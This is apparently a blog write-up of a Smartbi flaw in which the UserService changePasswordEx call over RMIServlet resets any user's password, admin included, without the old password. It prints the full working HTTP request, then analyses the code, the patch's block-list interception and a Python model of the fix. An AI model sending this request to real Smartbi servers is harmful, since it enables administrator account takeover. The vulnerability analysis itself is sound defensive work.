Smartbi modify user password vulnerability

Vulnerability Profile

Examining the information shipped with a Smartbi patch package showed that, under certain conditions, a user's password can be changed without knowing the current one. Below is a simple reproduction and analysis of the issue.


Vulnerability reproduction

When changing a password through the web page, the current password of the user has to be supplied.


If the following request is constructed directly, the original password is not needed at all: knowing the user name is enough to set a new password for that user.

POST /smartbi/vision/RMIServlet HTTP/1.1
Host: 192.168.222.133:18080
Content-Length: 73
Cache-Control: max-age=0
If-Modified-Since: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://192.168.222.133:18080
Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4A4AC06EC1DF3CDDC45239C211926FA1
Connection: close

className=UserService&methodName=changePasswordEx&params=["admin","","1"]


Vulnerability Analysis

smartbi.usermanager.ILocalUserManagerModule#changePasswordEx


smartbi.usermanager.UserManagerModule#changePasswordEx

The password-change routine takes the user name and the new password, looks the user up, and writes the new password for that user; it performs no verification whatsoever of the original password that is passed in.

The userId is looked up from the supplied user name, and the update is then carried out by the following two methods:

smartbi.usermanager.UserManagerModule#updateUserEx

smartbi.usermanager.UserManagerModule#updateUserExtend


Vulnerability fix

After installing the patch package and sending the same request again, the request is intercepted.


The patch checks the incoming className and methodName; when they match the blocked entry, processing stops and the call is not dispatched.
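The two ways of closing this hole, modelled as an added example that is not Smartbi's code: first the request-level interception the patch analysis above observed (refuse RMIServlet calls whose className and methodName match a block list), then the check the original method is missing, verifying the caller's current password before storing the new one. The block-list entry is the one from the post; the user store, hashing parameters and function names are assumptions made for the example.

```python
"""Added example (not Smartbi's code). Models the patch's interception and the
missing old-password check side by side. Storage and names are assumptions."""
import hashlib
import hmac
import os
from typing import Dict, Tuple
from urllib.parse import parse_qs

# Entry observed in the patch analysis: calls to this class/method pair are dropped.
BLOCKED_RMI_CALLS = {("UserService", "changePasswordEx")}


def is_blocked_rmi_call(body: str) -> bool:
    """Mirror of the patch behaviour: parse the RMIServlet form body and refuse
    the call when className and methodName both match a blocked entry.
    parse_qs tolerates the raw (unencoded) JSON in params as well as a
    percent-encoded one, so both forms of the captured request are caught."""
    fields = parse_qs(body, keep_blank_values=True)
    cls = fields.get("className", [""])[0]
    meth = fields.get("methodName", [""])[0]
    return (cls, meth) in BLOCKED_RMI_CALLS


def _pbkdf2(password: str, salt: bytes) -> bytes:
    # Assumed hashing scheme for the example store; Smartbi's own is not shown.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 50_000)


class UserStore:
    """Minimal username -> (salt, hash) store standing in for the user table."""

    def __init__(self) -> None:
        self._users: Dict[str, Tuple[bytes, bytes]] = {}

    def exists(self, username: str) -> bool:
        return username in self._users

    def set_password(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self._users[username] = (salt, _pbkdf2(password, salt))

    def verify(self, username: str, password: str) -> bool:
        rec = self._users.get(username)
        if rec is None:
            return False
        salt, digest = rec
        return hmac.compare_digest(digest, _pbkdf2(password, salt))


def change_password_vulnerable(store: UserStore, username: str,
                               old_password: str, new_password: str) -> bool:
    """Behaviour described in the analysis: the old password is accepted as a
    parameter but never compared against anything."""
    if not store.exists(username):
        return False
    store.set_password(username, new_password)
    return True


def change_password_fixed(store: UserStore, username: str,
                          old_password: str, new_password: str) -> bool:
    """The check the original method lacks: prove knowledge of the current
    password before overwriting it."""
    if not store.verify(username, old_password):
        return False
    store.set_password(username, new_password)
    return True


if __name__ == "__main__":
    s = UserStore()
    s.set_password("admin", "original")
    print(change_password_vulnerable(s, "admin", "", "1"), s.verify("admin", "1"))
    print(change_password_fixed(s, "admin", "wrong", "2"), s.verify("admin", "1"))
    print(is_blocked_rmi_call(
        'className=UserService&methodName=changePasswordEx&params=["admin","","1"]'))
```

The interception stops the captured request, but it only protects the one class/method pair on the list; the old-password check in `change_password_fixed` protects the operation itself regardless of which entry point reaches it, which is the property a reviewer should ask for.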


Source: blog.csdn.net/qq_38154820/article/details/132302735